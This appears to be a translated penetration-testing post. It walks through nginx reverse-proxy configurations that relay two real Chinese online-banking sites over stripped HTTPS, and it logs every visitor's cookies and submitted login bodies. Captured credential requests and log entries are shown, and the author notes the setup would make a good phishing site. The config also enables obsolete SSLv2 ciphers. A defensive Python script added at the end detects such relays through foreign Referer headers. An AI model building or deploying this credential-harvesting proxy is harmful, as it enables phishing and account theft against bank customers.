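During penetration testing you will run into HTTPS-encrypted web pages, where many tools cannot be used directly. You can use web server software to relay the pages and thereby strip the encryption. nginx is used for the test here.
Set up an nginx server and edit the configuration file /etc/nginx/sites-available/default. The configuration below uses China Minsheng Bank's personal online banking as the example.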
    # You may add here your
    # server {
    #     ...
    # }
    # statements for each of your virtual hosts

    server {
        listen 80;
        server_name localhost;

        access_log /var/log/nginx/localhost.access.log;

        location / {
            index index.htm index.html;
            proxy_pass https://ebank.cmbc.com.cn/;
        }
    }
Configuring proxy_pass turns nginx into a proxy server. After restarting the service, browse to the nginx server.
Capture the submitted data with WSockExpert:
    POST /weblogic/servlets/EService/CSM/NonPrivateLogin?channelID=&PriErrPage=PriErrPage.html HTTP/1.1
    Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
    Referer: http://192.168.52.129/weblogic/nonsecindex.jsp?channelID=
    Accept-Language: zh-cn
    Content-Type: application/x-www-form-urlencoded
    UA-CPU: x86
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
    Host: 192.168.52.129
    Content-Length: 78
    Connection: Keep-Alive
    Cache-Control: no-cache
    Cookie: JSESSIONID=KMhkvGWG51B1f3y37MXvpkqSWvc8vcShLcjnchyLQSzyQq32C5nh!1655737129!270743917; K-JSESSIONID-lgnlbcme=3334A3537EB07580F51C46CFC8ABF69C

    logintype=u&txcode=c99900&account=11111111111&loginPwd=222222&CheckCode=333333
To record the content submitted through the nginx proxy, modify the default configuration file.
    # HTTPS server
    #
    # Current nginx accepts log_format only at http level, so it is declared
    # outside the server block (this file is included from the http block).
    log_format main '$remote_addr - [$time_local] $request ||||| $http_cookie ||||| $request_body';

    server {
        listen 443;
        server_name 192.168.52.129;

        ssl on;
        ssl_certificate ssl/cert.crt;
        ssl_certificate_key ssl/cert.key;

        ssl_session_timeout 5m;

        ssl_protocols SSLv2 SSLv3 TLSv1;
        ssl_ciphers ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP;
        ssl_prefer_server_ciphers on;

        location / {
            # root /etc/nginx/html;
            # index index.html index.htm;
            proxy_pass https://pbsz.ebank.cmbchina.com/;
        }

        # Write each request with its cookie and body using the format above.
        access_log /var/log/nginx/access.log main;
    }
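The log file records $http_cookie (the cookie information) and $request_body (the HTTP body); this example uses China Merchants Bank's personal online banking. If a certificate that passes validation were also obtained, the site would become a rather good phishing site.
Below is one captured log entry. It includes the URL, the cookie information, and the submitted HTTP content: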
192.168.52.1 - [05/Oct/2009:14:27:24 +0800] POST /CmbBank_GenShell/UI/GenShellPC/Login/GenLogin.aspx HTTP/1.1 ||||| CMB_GenServer=Lo ginType:A&BranchNo:0010&CreditCardType:A&IdType:01 ||||| ClientNo=015C3BBB172525FEBE9231E3448941E1515070230094203100051384&ExtraPwd= 3333&BranchNo=0010&AccountNo=ipJSoiVbS3HNMcI-3vYQsHiFp0WLlDsX9-eWKN97PbekdnzNzVg288TJCW6VdxDpufQfejoTCe-uSmgWZL67AQ__&Password=ikS2P -JmservIWpMgda8hHEzLJA04Aa6viJx0QF2zrWUDlxiLpLTbqhbVNbfqgA0c7ipLQ0zLi3fEjZJAPRdMA__&HardStamp=Aj8wMTVDM0JCQjE3MjUyNUZFQkU5MjMxRTM0ND g5NDFFMTUxNTA3MDIzMDA5NDIwMzEwMDA1MTM4NElGYmltRWVOyyIm2848AfJ9ZSdePA9n6S4j8Yf212z5y2pbjApY1HinUJmJCwGL48QLiWo8*Fmm75fzVtjTH9*fjI2qx* CEXUKkf93ltwsSq5*UvM7zkGgCaCHXQPLF396CtYjkyC82CMVIHcB89kIq*iEF7XMXCbqKloHsh5LHSCYim0wKa28GzWczV2zX9tcqGkGAPwPXuzwTF3lk7BxZstXnFx59KK jVerd8V5RNf-JAGe0aBSgt3CxxJQ__&Licex=AjgwMTVDM0JCQjE3MjUyNUZFQkU5MjMxRTM0NDg5NDFFMTUxNTA3MDIzMDA5NDIwMzEwMDA1MTM4NAAAAAAAAACqPBt4PB7 VfxBrLCVptuY12saTrYLj9xrwnsmeVMxt5O4K9LASxMNND3gZ8QOr2eQavsKgpUfsscvzXohvN7E4tbJocTwnpx6SJRsNjXImZDYP*Tq0YjH6i2ZbZu0m7gtnL01ibfqjTxM a4vplPyCLgQ__&LoginType=A
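The login request captured earlier carries `Referer: http://192.168.52.129/...`, and nginx passes that header to the upstream unchanged, so the real site can flag logins relayed through a proxy like this one from its own access log. The following is an added example, not part of the original post; it assumes the origin logs in the standard "combined" format, and the allowed host, login path and sample lines are constructed from values shown on this page.

```python
import re
from urllib.parse import urlsplit

# Assumption: hostnames the real site serves its own login pages from.
ALLOWED_REFERER_HOSTS = {"ebank.cmbc.com.cn"}
# Assumption: login endpoint prefixes to watch (path taken from the capture above).
LOGIN_PATHS = ("/weblogic/servlets/EService/CSM/NonPrivateLogin",)

# One line of the nginx/Apache "combined" access-log format.
COMBINED = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

def relayed_logins(lines):
    """Return (ip, time, referer_host) for login POSTs whose Referer names a foreign host."""
    hits = []
    for line in lines:
        m = COMBINED.match(line)
        if not m or m["method"] != "POST":
            continue
        if not m["path"].startswith(LOGIN_PATHS):
            continue
        host = urlsplit(m["referer"]).hostname  # None for "-" or an empty Referer
        if host is None:
            continue  # a missing Referer is common and proves nothing either way
        if host.lower() not in ALLOWED_REFERER_HOSTS:
            hits.append((m["ip"], m["time"], host))
    return hits

# Constructed sample lines (not real logs); client IPs are documentation addresses.
LOGIN = "/weblogic/servlets/EService/CSM/NonPrivateLogin?channelID="
SAMPLE = [
    f'203.0.113.7 - - [05/Oct/2009:14:27:24 +0800] "POST {LOGIN} HTTP/1.1" 200 512 "https://ebank.cmbc.com.cn/weblogic/nonsecindex.jsp?channelID=" "Mozilla/4.0"',
    f'198.51.100.9 - - [05/Oct/2009:14:28:01 +0800] "POST {LOGIN} HTTP/1.1" 200 512 "http://192.168.52.129/weblogic/nonsecindex.jsp?channelID=" "Mozilla/4.0"',
    f'203.0.113.8 - - [05/Oct/2009:14:29:10 +0800] "POST {LOGIN} HTTP/1.1" 200 512 "-" "Mozilla/4.0"',
    '203.0.113.8 - - [05/Oct/2009:14:29:40 +0800] "GET /weblogic/nonsecindex.jsp HTTP/1.1" 200 900 "http://192.168.52.129/" "Mozilla/4.0"',
]

if __name__ == "__main__":
    for ip, when, host in relayed_logins(SAMPLE):
        print(f"{when} login POST from {ip} with foreign Referer host {host}")
```

The source IP on a flagged line is the relaying server's address as seen by the origin, so many different accounts logging in from that one address is a second signal worth correlating.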